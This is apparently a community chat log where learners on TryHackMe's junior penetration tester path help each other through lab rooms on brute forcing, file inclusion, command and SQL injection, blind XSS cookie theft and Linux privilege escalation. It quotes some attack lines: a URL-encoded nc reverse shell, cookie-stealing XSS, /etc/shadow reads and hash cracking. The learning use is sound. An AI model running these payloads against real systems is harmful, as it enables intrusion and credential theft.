#junior-pentester-path
Post a screen of that new request pls. I doubt the issue is on the target machine.
BINGOOO, worked after restarting the target machine
@shadow echo thanks for helping with that, the 2 extra lines i think were the issue
Gave +1 Rep to @shadow echo
Hey guys! I'm working on the room https://tryhackme.com/room/authenticationbypass During task #3 we're asked to use the previously generated valid_usernames.txt file to bruteforce the login page. The thing is, when I use ffuf to accomplish this it returns no valid combination. At first I thought I had typed something wrong, so I copied and pasted the commands into my Kali VM shell. The results were the same, so I wondered if it could be the version of SecLists I was using, so I booted the AttackBox on the website, did everything again and the result was the same. Has anyone else had this issue?
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200
The location of seclists will be different
I know, i had this problem. ffuf just runs fine, it just can't find a match.
Check your username list. There should be only 1 username per line and not the status codes or any other stuff in it.
Gave +1 Rep to @shadow echo
Will try. Thanks!
That did it. I wonder why though. I used the -o flag during Task 2 to generate the file. I guess this is somehow incompatible. Thanks again, anyway.
Can anyone explain more about flags? In labs it seems mostly about finding the flag, but in real life what is the advantage? What is a flag?
I just started with TryHackMe
It's okay, just making sure, cuz I'm not clear on that
Thanks for giving an example
Gave +1 Rep to @steel nymph
Thanks for the further info on this!
Gave +1 Rep to @steel nymph
Was anyone able to craft a ||POST request in Burp|| for solving Challenge 3 (flag3) in the File Inclusion room? I broke my head trying to solve that, I eventually did it via a ||curl -X POST|| request but am very keen to know what I was doing wrong in Burp.
What I did in Burp is ||I intercepted the GET request when I tried to include the LFI path via the web, sent it to Repeater. Changed the method to POST, removed ?file=<path> from the URL and appended file=<path> at the end of the POST request just on a new line. When trying to POST it that way the page is loading without any errors/indications at all. I tried to strip all other variables from the header like User-Agent etc... leaving only the POST line, Host: and the file=<path> line but still the same. The identical thing is working fine when POSTing with curl 🤷 ||
That is exactly what I did if you read my hidden msg. Or you mean something else?
Yeah I left one empty line before the body, and 2 empty lines after the body (if that really makes a difference, not sure tbh)
Inspector ? Let me check
Yeah file= is in body
Remove the empty lines after the parameter in Burp or whatever you use, otherwise these will be appended to your parameter. Not sure if it would also matter with the null byte at the end, but without it, it does.
Hey, I've got the flag for Command Injection Task 5, but I don't think I've understood it correctly.
I followed the aforementioned technique in Task 3 and ||combined commands 127.0.0.1 && cat ../../../home/tryhackme/flag.txt to get the flag, but I don't understand exactly why cat ../../../home/tryhackme/flag.txt|| wouldn't work by itself? Is it purely a case of filters?
You should ask yourself why by entering 127.0.0.1 into the field the site responses with a ping result.
Do you know what && does?
It will only run the second command in a certain case
As far as I was aware that operator was just to combine commands
There's a tiny bit more to it than that
Try to answer my question. Why by merely entering the IP the site shows the ping command result.
Because its intended purpose is to return ping results
Right. So "ping" is running already. If you would just enter cat ... it would execute ping cat ...
Yea I got that once I'd answered why ha. Sorry, very sluggish today, thanks for the prompt 🙌
Thanks @modest arch
Gave +1 Rep to @wispy nimbus
The only other context I can think of is in that of booleans. But I got the gist anyway 🙂
Yep
cat /etc/shadow && pwd for example won't run pwd if cat /etc/shadow fails.
So because you're missing an argument to ping, it exits with an error code, and thus the second command doesn't run
Thanks @idle bison
Gave +1 Rep to @idle bison
In fact, I wonder if you tried ; cat whatever
Authentication Bypass (Username enumeration)
You can manually create a valid_usernames.txt or add to the ffuf command the following:
-of csv -o templist.csv && sed '1d' templist.csv >> templist2.csv && cut -d"," -f 1 templist2.csv >> valid_usernames.txt && rm templist*.csv
Lol.. yup 😄
Full paths are usually a good bet
How can I connect my try hack me to my own linux and continue with mine
Please don't ask the same question over several channels
Why
Because it's spammy
Ohh, sorry about that... I wanted the fastest response, that was why I had to send it to different channels
Hi guys, any ideas for this problem?
linux privesc task 11
shell has right permissions
code is fine
idk why it doesn't work
Nearly. Owner is wrong, that's a part of the permissions
At least if you're trying to become root
Have you done the linux fundamentals content?
Ohh, give me moment
I got this! Thanks dude 😄
Gave +1 Rep to @idle bison
There was problem with owner of shell
I'm on the metasploit meterpreter room and my initial access keeps failing
[-] 10.10.138.244:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
do i need to set the SMBSHARE option?
Could you send a screen of your options?
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.138.244 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass Pasword1 no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser ballen no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.13.26.238 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Is the lhost your tun0 IP or are you on the attackbox?? And how long has the machine already been running?
it is and 10-15 minutes or more
I've got 1:35 left
so... maybe 25 at this point
password is missing a character
Ah, ye now I see it too 😄
got it. sorry. typing is hard lol
Hello everyone! I am at the Cross-site Scripting Task 8 Practical Example (Blind XSS). I am able to catch my own session cookie via the NC listener, but I don't manage to get the staff-session cookie. Can anyone give me a nudge?
Try it on the attackbox or the request catcher in case you are doing it on your own machine. People reported it's working better there. In case you get nothing within 2-3 mins with these options, try to restart the target machine.
did it already. still same result
And the result is that you get no request? Or only of your own session?
Well, if you verified by manually opening the ticket that you get at least your own session cookie, so that you know your payload is working, I think all you can do is restart the target machine and try again.
I restarted the target machine several times already
on the request catcher should I also mention the .log.tryhackme.tech in the payload?
You are not putting the payload in the subject field, are you?
Well haven't you verified by manually opening the ticket that your payload works correctly?
I tried several things and the only method that worked for me so far is the NC listener. I only managed to get my own session cookie when I opened the ticket
Can I dm anyone to check if the payload that I'm using is correct about the request catcher?
Well the request catcher link, for example of my session looks like this 29a6cfa6006ff6d7539ccf80bd490607.log.tryhackme.tech
So that's the full url you have to put in the payload for your request catcher
You can just paste your payload here, or send me a DM with it
Does anybody know how to only capture requests from one specified url in Burp Suite?
Scope
I set Target > Target scope > include in scope to machine ip and Set Proxy options intercept rules URL is in target scope, and I'm still capturing https://tryhackme.com/socket.io requests. Am I missing something?
Yeah, those are websockets?
Hiya, apologies if this is a repeated question. I have two flags for "Walking an Application" but they aren't being accepted by the form.
Has anyone else experienced this?
Every other flag is correct, it's just the two that aren't.
So I have the flag from the framework question at the end of the "Viewing Source" section and I have the flag for the last question but the fields keep saying incorrect.
|| THM{CHANGE_DEFAULT_CREDENTIALS} || and || THM{HEADER_FLAG} ||
Yeah there's other flags in there from other challenges
I've found a few myself and went "huh?"
when it says I have three machines open, is there a place where I can turn them off?
I started my machine in task 1, and I am trying to access my attack box but it says i cant have more than 3 open? not sure how that is... sorry for my noob question
looking now
because when I have a task, I start the machine, and then I start my own attackbox, correct?
you can just use the ip address and go from there in your own vm?
THANK You so much by the way
youre right, i had the machine open in the first lesson
can I add people to then message later?
awesome man. I'm a cyber engineering major (just started) but now I have to actually try to break stuff in my free time
not something you just regurgitate from a textbook, but this is overwhelming making sure you have things set up right
ok so this is normal right? no clue what I am looking at ha. I was about to pull my hair out
just to get a hang of everything? I have some linux and network basics
not an expert but just surface level stuff and I know my way around linux command lines
you know a worthwhile difference between the junior pentester and offensive pentesting?
isnt that the same thing basically
ohhhh so def do jr pentest before offensive
Jr pentester is essentially an intro into the world of pentesting specifically, whereas offensive pentesting assumes you already know the basics and challenges you to learn more
need help on the ssrf task 2
Hi, can I help?
yes pls
I know that I need to include the &x= but I'm not putting it into the right spot or I need to eliminate some things
this is what i have right now
why &id=9?
i need to force the webserver to give me information on id 9
if it's an id based resource then shouldn't it be https://website.thm/item/9 ? also the request params you have there contains two ? you got this
so I still request from the server but it'll be a request to id 9 and then &x= to omit the rest/the part for id 2
i figured it out
once i looked at the server requesting i put in the part that i wanted after the server=
which was the url they gave us
just shortened
when that didnt work and i saw the server requesting i saw that the end wasnt letting the page go through
🎉
does the junior pentest help and go through ctf?
it introduces you to some of the most common tools used by pentesters
i'd say it helps with playing CTFs to some extent
you might be (more) ready to attempt the eJPT now... lol
Honestly I kinda messed up on that regard
I put a lot of my eggs into the "general security" cert basket and now I'm tapped out of funds for more until I can swing a job
Got my CISSP tho
Which I can't list on my resume
😄 woo
I don't have the experience required to "get it"
You need to pass the cert AND have the experience
Otherwise they'll take away all your certs and ban ya for life if you put it on your resume
(or so they threaten)
ohhhh... yeah the 5 years of required experience is a pretty big gatekeeper
iirc you have 6 years after getting the CISSP to earn the 5 years of required experience
Yeah so I'm cool on that, and I already have 1 satisfied by my bachelors in cysec
assuming that one has no IT experience at all, they'd have at most 1 year for not getting any experience
So I have 6 years to get 4 years very doable
better find an IT job if you wanna keep the cert 👀
I'm tryin D:
are you not able to add a screenshot in this chat? I see it on personal message but I dont see it here. thanks!
where is that at? I dont see it
you could either copy the screenshot to your clipboard and press Ctrl+V to paste it in here
or you could click on the circle '+' button to the left of the chatbox and select the screenshot file to share here
i think you could also directly drag and drop the screenshot here if you've saved it as a file
ah so you might need to verify your account here before you could do that
!docs verify
As have I 😄
would love the help if anyone could assist.
I was just able to download staff.txt (which I believe has a password in it) but I can't find it so far.
any ideas where this would be on my system
found it!
I was able to find the username!!! now we move onto the password
such a good feeling when you crack something....
You try /etc/passwd and /etc/shadow ?
hello everybody. Is there someone who could assist with the LFI - I have one question on a task to proceed
Ask away. I'll see if I can assist.
which task is it? the last LFI challenge could be quite difficult
that one took me quite a while to figure out
Hey ... any advice for running the "fuff" command ... ran from attack box and says it's not found
ffuf, not fuff
thank you! 🙂
FFUF, short for "Fuzz Faster U Fool" 
Can anyone tell how to execute .elf shell in target machine
I am doing msfvenom task in metasploit room 2
Is this suggestion for me?
lol
I covered those rooms long time ago
I am getting segmentation fault
I never executed .elf file in linux so I thought maybe it will execute in different way
ok Let me check again
I accidentally used the default handler
you were right
Thank you
can anyone explain this error?
I need user ntlm hash but only getting the administrator one
Not sure, but I think you can not run it inside the meterpreter shell like that. Try to background the session and then choose the hashdump module where you set the session to the session you have in the background
Both are same
Did you try another hashdump module? As I think there are a few
Nmap Live Host Discovery task 2 subnetworks. I don't get any response when using the website, is it broken?
Did you answer the questions on this task?
not yet
And when you sent a request from computer4, did you get a response?
no, I tried multiple packet types and computers but never get any response
I don't know why you tried multiple computers and packet types. The site works for me.
I tried it to see if I could trigger any response from the website
Do you see packets "travelling"?
nothing is happening at all, I will try another browser
Try refreshing the page perhaps.
Google Chrome works now, not on Safari apparently
anyone available who completed attacktive directory?
I am having issues with Challenge #1 on the File Inclusion module. I have tried changing the GET to a POST in BurpSuite and also changing the GET to POST in developer mode and I still cannot view the flag 1 file...Does anyone have some suggestions?
No worries did it
Thanks for the help 👍 I was missing the / after port
Gave +1 Rep to @steel nymph
In the linux privesc room -- I'm on the box, but I can't find anywhere with write permissions. (task 5). Anyone able to offer a hint?
nvm, I'm supposed to be looking for a kernel exploit first, i think
thanks for the help
Gave +1 Rep to @steel nymph
I need help on the jr pen test
I can't post images.
*** Generating Wordlist...
(!) FATAL: Error opening wordlist file: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
thats what i get when i enter
user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://MACHINE_IP/FUZZ
Its in the
Task 12 of content discovery
called Automated Discovery
There are 3 diff commands for this
None of them work
all give me an error to do with it not existing
Via AttackBox or OpenVPN?
I'm using my own VM
but i tried it with attackbox
and i got the same error
/result
Wait
wait
.
Are you positive that the wordlist exists at the given path?
I'm not positive, let me check
ls /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
okay so
it was
in /usr/share/seclists/Discovery/Web-Content/common.txt
for some reason
there we go
i had to confirm
@modest arch Thank you
Gave +1 Rep to @wispy nimbus
Well I downloaded an app called Postman, examined GET requests, changed some variables, still nothing different I couldn't achieve in developer mode or Burp Suite. Still missing some key piece of info here.😩
Lol, I didn't mean it literally
you need to become the POSTman
thx, this was like playing battleships I was all around the target but couldn't sink the ship. What's interesting is I did external POST requests with such info and it got me nowhere but when I used the embedded form POST it was reading in the buffer so it spewed all characters and yet the same POST request got me nowhere. I did play around with the form POST much earlier but I guess maybe I ignored something because Burp at one point changed its output. Thanks solved.
So, I'm working my way through the Command Injection room and in Task 5 you're asked to attack a website. Easy enough.
Out of curiosity, I was wondering if it was also vulnerable to XSS. Which it is, for the standard <script>alert('Test');</script> payload.
I was wondering if there was a way to get the Command Injection to output inside of the XSS window? Ie:
;id;
into
<script>alert(String(;id;));</script> or something of that ilk.
Possible. One way I can think of is that you can replay the request inside the script.
Inside the form address, the XSS will be
<script>window.onload = () => fetch(`/?address=127.0.0.1+%26%26+id`).then((response) => response.text()).then(console.log);</script>
then you can start parsing the results body in place of console.log
Hi all! I'm trying to do https://tryhackme.com/room/linprivesc task 5
but i'm getting a file not found 404
anyone have an idea what's up
What is it you're trying to do/look for?
Trying to download the exploit from the attacking machine to the target machine
have already compiled, so in the target machine i used -> wget http://ipaddress:8000/filename
getting a 404 for some reason .
Says file not found.
Make sure that you've set up your http.server in the directory where the exploit is stored, also it could be worth trying a different port (I usually go for 9001 and have never had any connection issues)
omg!
Didn't set the http.server in the directory
Silly me. Thanks @low cloud !!
Gave +1 Rep to @low cloud
Not an issue, happy hacking!
anyone completed splunk 2?
@modest arch Please don't ask the same question over multiple channels
Please ask your question directly
sorry about that just wanted someone to discuss with privately that's all 🙂
Can anyone tell me what is the intended way of finding password of user2? In Linux PrivEsc > SUID Task
Have you looked for suid binaries?
yes i got base64 which i used to output shadow and passwd file.
Ok, have you tried to crack the hash for that user?
i did using hashcat i got pass for gerryconway only.
Is the intended way to find the password cracking the hash? Because they didn't mention which dictionary to use; usually they do, to reduce the time for cracking.
Use rockyou?
I don't know, but I can add one and one and realise that if you can read the shadow file and it's asking for the user's password then cracking the hash is a good route.
What I did is tried the same password for my current user and it worked on user2? But user2 doesn't have permission to read the flag
You know
so I thought guessing wouldn't be the intended way
yes
Ok. The user doesn't have permission to read the flag.
Do you see what I'm getting at?
i tried i think but i don't know the location of flag.
Then how do you know you can't read it?
oh I think I didn't try it after I was user2, so stupid, ok I'm gonna try now. (this happens when you practice at 2 in the morning)
I got the flag👍 but i don't feel comfortable getting user2 password by guessing and not using john or hashcat
I think the point of it wasn't to guess but to look at the shadow file and the hashes in particular and see if you notice anything similar
it wasn't similar although the passwords were same hashes were not
can anyone tell me how much time it takes to see the request come through containing the victim's cookies in XSS LAB
It's already been 3 mins. No request has been seen from the other side
you should have something by now
Gave +1 Rep to @steel nymph
it worked
Could I get a tip on SQL injection task 8? I know that || table_schema = 'sqli_four' table_name='analytics_referrers' and column_name='id, domain' || I'm trying to input || from analytics_referrers where id like 'a% || and I've tried basically every input on my keyboard but I'm not getting anything. I also am not getting any errors; if I change the from statement up a bit I get errors, but not when I run it like I wrote it
sorry i edited the text i pressed enter too early
why am i not getting errors lol
i got it thank you
Hi guys
Working on the Cross-site scripting practical example (blind xss)
I'm using the TryHackMe request catcher, however it does not seem to be fetching the cookies
Anyone else have any trouble with this?
Can anyone in the Burp Intruder room help?
Task 8, please.
Can anyone?
Task 8 says the following: How many request will intruder make using these payload sets in Cluster Bomb attack?
Can anyone help on Walking An Application please? I was stuck on task 3, unable to access the URL. I have replaced the URL with the IP but get the same error 504 gateway time-out
cluster bomb tries every possibilities, and you have 3 sets of 100, 2 and 30 lines.
the url is not a typical IP address, you have "-" instead of dots
do you catch your own cookies ? if yes, try to restart your attack machine, it seems some people have trouble with this.
thanks for the advice. I will give this a try
Gave +1 Rep to @copper sentinel
Can anyone help me with Task 9 - Linux PrivEsc Room? I changed the crontab to a reverse shell to the attackbox, but it seems the crontab is not running, or what am I doing wrong?
Thanks @steel nymph, I tried running the bash command as karen, and it can call back to the attack box. Let me try another method
Gave +1 Rep to @steel nymph
Yes, I'm restarting attackbox and target machine. Let me try with the bash script as karen
Thank you @steel nymph, i solved the problem.
Gave +1 Rep to @steel nymph
I'm having a problem with the ffuf command in the subdomain enumeration room
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.120.61
Hey guys, new here. I'm a complete beginner to cybersecurity, I'm trying HTB and THM as a hobby and I love it. I, however don't really understand how to get flags. For example root flag, or user flag, etc. I have kali installed in VM. Would love some help here.
I didn't understand how to do this sum.
Hey bud, I'm not at my computer right now but when I get on a little later I will check to see if I can see the cookie under inspect --> Network
I have tried both the THM Attack Machine as well as through Firefox using OpenVPN while turning off the built-in security feature, but I don't seem to get anything on the THM catcher
@copper sentinel
Eyyy, can i ask about the JR Penetration tester > Introduction to web hacking > sql injection > Task 8 Blind SQLi - Time Based
dont ask to ask, just ask
Ye i'm searching through old messages
I am able to get the session cookie now in the Cross-site scripting room however i have tried both base64 encoded and decoded values but it's the wrong answer
Can anyone advise on this?
You need to get the staff cookie.
@chrome sand See @shadow echo post. #subs-room-help message
SQL Injection Task 8:
As a first enumeration step, this seems to be the right input, but seems unreal:
||admin123' UNION SELECT SLEEP(5),2 where database() like '_________';--||
Is _ being treated as a placeholder?
Hi. I'm stuck in the Vulnerability Capstone challenge.
Here's what I did:
|| I used the exploit at /usr/share/exploits/vulnerabilitycapstone/exploit.py in the attackbox. I opened a netcat listener on the same machine on port 5555. I ran the python exploit, typed in "shell_me" and entered my IP:PORT in the required format. ||
However, I'm getting a response like this:
|| HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //10.10.234.210/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27rm%20/tmp/f%3Bmkfifo%20/tmp/f%3Bcat%20/tmp/f%7C/bin/sh%20-i%202%3E%261%7Cnc%2010.10.34.112%205555%20%3E/tmp/f%27)%2B%27 (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f1435399ba8>: Failed to establish a new connection: [Errno -3] Temporary failure in name resolution',)) ||
I restarted the attackbox, vulnerable VM both as mentioned by someone in the chat before.
Any idea what I can do to solve this issue?
You might have to look it up what the _ is deemed as. But yes, something like that, wildcard/placeholder.
Did you use python3 to run the exploit?
Hello everyone. Anyone working on the Linux PrivEsc room in this path? Stuck in the SUID task and would like some guidance. I have obtained the hash of the user2, but I cannot use any online tool to crack it under SHA512 or MD5. Furthermore, cannot install John on the server. Also not able to create a new user in the /etc/passwd file.
Hi everyone, I'm stuck at time based blind SQLi
Why would you have to install John on the server? Do it on your local machine with John.
when I input this command it doesn't give me anything: referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';--
can anyone help ?
but
referrer=admin123' UNION SELECT SLEEP(5),2; this command does work
Well that would mean the database name doesn't start with u
ahhh i see
so do i have to change the character ?
Yes, you have to go through all characters until you get a response, then you know with what character the database name starts with, then you do the same for the 2nd character and so on
Understood.. Thank you so much
hello folks, anyone there who can answer me a question on how to access the windows box? There is no login data provided in the privesc section
Check the other tasks, the username and password will be the same for all the machines in that room
This means that if like 'sqli_five' is positive, it might still not be right, since _ could be a placeholder. So every time you get an expected response when _ is included, you would have to verify with = instead of like?
Well, not sure if the _ is not deemed as a placeholder when you use =. But regarding the other database names' format, you could assume that the _ within that name is not a placeholder.
are there extra steps that i need to do ?
I got "misled" once I got to 'sql' I added a bunch of _ and got the 5sec delayed response. I only figured that out by the next step that the name was not correct. BTW, = doesn't take _ as a placeholder. Just in like.
Why would that be the password? The password is stored inside a table in that database. So since yet you only got the database name, the next step will be to enumerate the table names within that database.
jesus sqli is complicated
... thank you ill look into it
Gave +1 Rep to @shadow echo
Oh okay, ye if it's not taking it as a placeholder within the = then it's anyways an easy task to verify it 🙂 And I was also stuck with the _____ in that task until I figured out it is some kind of placeholder 😄
Thanks for the assistance. I am just wondering if this function can be helpful to enumerate things quicker/easier... (what could be the benefit of using a placeholder over a wildcard)
Gave +1 Rep to @shadow echo
Well like I said I'm not sure what the _ is really deemed as. But in case it is a placeholder, the benefit would be that you can figure out how many characters are used immediately, which you can't figure out with the wildcard. But as I said, I haven't looked up what the _ is used for, so don't take that as true 🙂
@shadow echo Might interest you:
https://www.w3schools.com/sql/sql_wildcards.asp
Thank god, finally understood SQLi
I have to re-read everything
To understand more clearly Thanks @shadow echo
Gave +1 Rep to @shadow echo
Oh okay nice, ye then regarding to that I would assume it would work to figure out the amount of characters with the _ So as the database name has 9 characters, if you try using like '_________' (9x _) it should give you a positive response. In case you only use it 8x or 10x it should not give you a positive response, so therefore you figured out the name has 9 characters. But maybe it's not that reliable, as in case there is another database that also has 9 characters you would also get a positive response, but it was just an idea on what benefit you could have by using the underscore
I guess if you automate the process, knowing the number of characters is crucial. Is it doable with Burp? (haven't gone through that module yet)
I mean for that task it might be possible, but I guess you anyways would have to go through all character positions on your own, but at least for each position you could do it automatically with Burp.
Hi, I'm working through file inclusion on the jr. pentest pathway and I'm stuck on the challenge 2 question. ||I believe I need to send a new "GET" request so I've tried changing the cookie from THM=Guest to THM=admin but it's not working. Am I missing something?||
I'm getting frustrated lol. I feel like I have played around with it as much as possible but I still can't find the code
Do you see how the warnings and the site in general behaves when you play around with the cookie?
No.. Am I doing it properly? ||I'm using Network under dev tools, then clicking one of the files > edit & resend > and changing cookies: THM=Guest to cookies: THM=Admin||
get a cookie editor addon on firefox/chrome
I mean I guess you could do it that way. But as I assume you are on firefox, you can simply go into storage in the dev tools, change the value and refresh the page
Thanks. That's a much simpler way of doing it
Gave +1 Rep to @shadow echo
Why isn't the "> part causing any problems in my XSS payload?
here is the screenshot of my page source. It worked I just feel like it shouldn't have!
Well the value= field from the input tag is closed with both of the " " and the input tag itself with the > and all the other tags are also properly closed. So in that case I assume it's just getting displayed on the web page itself as text and is doing what it's supposed to do.
One more doubt: why is the following happening? Both are collected from the same page.
HTML parsing isn't quite like programming language parsing.
It tries its best to understand it within the rules
It's added by javascript. When you view page source, it doesn't show the current state. Inspect element does.
Thanks, it's clear now.
I am doing Windows PrivEsc task 5 (using web interface) and need to change user to Jack but I cannot find option to do that. I tried:
- logout (but then automatically I am logged back in without being asked to select a user)
- Alt+Ctrl+Del (this did not work using osk)
- Lock (this does not give option to login as different user)
- tried to disable auto-login via user management (netplwiz) but am standard user so cannot do that
Any hints would be most appreciated
One possible avenue is to run cmd as a different user as this option is available from windows explorer 🙂 (seems I messed up changing Jack's password tho so need to revisit)
Doubt in Task 8 of XSS: both of the following didn't send any information to my netcat server.
The underlined statement is what I entered in the ticket content box.
The following was working
You could just also RDP in as a different user
It says I don't have access to that link
@modest arch nvm, I got verified and it took me to the link, thanks! I will check it out and see if what he said works for me
Gave +1 Rep to @wispy nimbus
I copied the hash of the user into a txt, but John couldn't work on it. On further reading, I discovered that both the shadow and passwd files are needed for the GECOS information... how do I do that? Will simply copying the information help? I can access the information completely in /etc/passwd and /etc/shadow
Room: Linux PrivEsc, Task : SUID.
Burp Suite: Repeater
Task 7
Can someone explain please why ||-1|| causes a 500 error whereas *1 a 404 error?
yes it has, but the server doesn't have john and also doesn't let me install. Further, not able to add a root user in /etc/passwd...
So have you solved it now, or are you still stuck?
Thanks for that. I'll try to look deeper into this.
Gave +1 Rep to @steel nymph
still stuck...
@shadow echo @steel nymph
It was a long slog, but I learned so much! Thank you @tiny bluff
So in that task there is an example of how to use unshadow on the /etc/shadow and /etc/passwd files. All you have to do is copy the contents of the shadow file from the target machine and create a new file on your own machine and paste it in there. Then do the same for the passwd file and follow along with the steps in the task. So there is absolutely no need to install John on the target machine or whatsoever.
A little help please. I am stuck on Linux privesc room task 6 in which two methods are shown: 1) run apache2 with config inclusion and 2) use LD_PRELOAD with sudo enabled commands. However none of these seem to be available.
- apache2 does not seem to be installed
```
karen@ip-10-10-121-154:/tmp$ which apache2
karen@ip-10-10-121-154:/tmp$ find / -name apache2 2>/dev/null
karen@ip-10-10-121-154:/tmp$
```
- The `sudo -l` output does not allow LD_PRELOAD
```
karen@ip-10-10-121-154:/tmp$ sudo -l
Matching Defaults entries for karen on ip-10-10-121-154:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User karen may run the following commands on ip-10-10-121-154:
(ALL) NOPASSWD: /usr/bin/find
(ALL) NOPASSWD: /usr/bin/less
(ALL) NOPASSWD: /usr/bin/nano
```
and trying gives an error: `sudo: sorry, you are not allowed to set the following environment variables: LD_PRELOAD`
It almost seems I am running the wrong box...
You found 3 binaries you can run with sudo, so as the LD_PRELOAD is not set, you might want to use these for priv esc
Thanks @shadow echo, let me try (seems so obvious when you pointed that out!)
Gave +1 Rep to @shadow echo
ok nice! I will work on that, thanks @shadow echo
Gave +1 Rep to @shadow echo
I'm doing challenge 2 in File Inclusion. I have completed the challenge and it says "This is a admin web page! Get the flag!" but I can't find it. Should it be on the page or do I need to traverse to another one?
have you checked the website source code????
I've checked the source code already and thanks @steel nymph I will
Gave +1 Rep to @steel nymph
Finally finished it. So many broken rooms that I needed to figure out fixes for to move on. Burp Suite was a constant pain to keep working.
I keep getting sandbox errors and have to change a bunch of settings each time I open an Attack Room. Browsers won't open from inside it in attackbox.
Cc @primal whale
Thanks @idle bison hey @finite summit sorry to hear that. Do you know exactly which rooms you had these issues with using the AttackBox? (a URL for the rooms would be super useful if you could)
Gave +1 Rep to @idle bison
I’ll try to replicate it and investigate it as best I can
Although it sounds like it's not related to the room?
No it doesn’t sound related to the room
But if it’s happening in x/y/z I could recreate it quicker in theory
Rather than just trying random rooms until it occurs
Jr pentesting burp suite
All of the rooms in that module?
When you open the AttackBox and start machine, once loaded. Burp Suite would give the error on sandboxing when you tried to use it. I did find a work around for that. Some of the other features like opening browser failed.
Damn.. I'm annoyed at how long I spent struggling to find the flag on chall2 in the File Inclusion task
It took me too long to realise what to change the cookie to
I agree some rooms are way harder than they should be for a learning experience
Well the Jr. Pentester Path is marked as "Intermediate" so..
It's a challenge in a pathway that's marked intermediate. I think the difficulty is exactly where it should be
I look at Try Hack Me as a learning classroom to help teach you the skill set of each room. Some are designed better to give you the knowledge and provide a sandboxed attack box that you can safely apply what you are learning.
Yes but the goal is for you to learn. Challenges are a way of testing your understanding. They're designed to be hard but if you really understand what you're learning they aren't all that difficult to complete
I started in learning mode to work through all the tools. I built a Kali Server on my home network and have Ubuntu servers on my VMware Server.
Hello, in the "Introduction to Web Hacking - Walking an Application" room, the last question requires me to type the flag in the response header. I found it, copied it, and it tells me the answer is wrong. Is it possible that there is something wrong here? Or am I looking in the wrong place?
I don't want to spoil the answer for others just in case
alrighty then, thanks
Your point is?
In learning mode right now. Not challenge mode to practice. Many tools to learn to use for work.
I will go back through the list and tell you. Blind SQLi, Linux and Windows PrivEsc could have been more clear in the notes. I have my B.EE. The textbooks (for most classes there were 4-5) explained the material to a certain level. Class instruction went over gotchas and what not to do. The labs brought together the material. The professors would give you real life work projects you would build for customers. You would have to design, price, cost analysis, MTBF, etc.
There's a feedback form linked in #feedback-and-ideas
This is the sort of things that I'm sure the site staff would absolutely love to know
I didn't notice that section. I design my web sites to show how to do various tasks and put my notes in it for everything I do.
You can add that to the feedback form too
Too many walkthrough pages with the answers on it help when I really get stuck for days. You don't need to know the answer only where to quickly find it and how to apply it. I have limited time to work on this material. I also have web sites on Arduino and Raspberry Pi builds that I do. Add in a wife, 3.5 year old and 6 year old that get priority over everything else.
Uh, what?
While we're at it:
Cc @primal whale
There's a whole explanation of what that is and why it happens in the room, at the first place you are told to open the browser. If you're trying to open it before that and having to debug it yourself, that's entirely your own fault
TL;DR (for CMNatic's benefit) -- that ain't an AttackBox problem. It'll happen whenever you run Burp as root on Linux.
I found that one a few weeks ago. I try to give THM about 30-60 minutes a day at most. I can usually get in some of it at work between chaos and endusers.
could anyone possibly explain the highlighted part in a simpler way... it's the authentication bypass module - logic flaw
^ not really getting it
I'm having issues with the Task 3 of the Protocols and Servers section in network security. for some reason it's not allowing me to retrieve the flag from the server. I restarted the VM multiple times and made sure I was entering the correct commands, any suggestions?
How are you trying to get the flag?
The task want you to retrieve the flag using telnet, when I try to connect it says "Connection closed by foreign host".
So what have you entered in the telnet session?
GET /flag.thm HTTP/1.1 Then host: telnet
Did you press enter 2 times after host: telnet ?
Nope, I just recreated the scenario and made sure to not press enter more than once
Then press enter 2 times after host: telnet
a real head slapper, thank you @shadow echo
Gave +1 Rep to @shadow echo
Just finished this path!!! Feeling really accomplished. Which path should I do next?
can anyone help me with this. This question is the last one to complete the jr penetration tester path?????????????
the payload is right??
it's working now, I'm getting data in nc but the cookie is the same as I'm getting in the cookie editor firefox extension and it's not working as the answer😢.
what can i do???
btw I'm not logged in as admin because it didn't say anywhere to log in as admin in XSS.
If you open the ticket on your own, you obviously only get your own session cookie. You have to wait until the automation that's going to open the ticket as a staff member is triggered. Shouldn't take longer than 2-3 mins at most.
so i don't have to open the ticket by myself after creating it???
No, like I said, if you open the ticket on your own you will only get your own session cookie.
ok l will try that thanks for the explanation 👍🏻
Thanks very much, I solved it.
Gave +1 Rep to @shadow echo
Finally I have completed this path. I feel I have learned a lot. Also I got a 22 day streak
Thank you for this @tiny bluff
Wow good work man
Keep up the good work and you will be an elite hacker in no time
When you phish a link, for example an Instagram phishing link, is it possible for the phishing link to exactly like Instagram's phishing page with logo and everything?
*to look
You don't phish a link, you phish a person.
And yes?
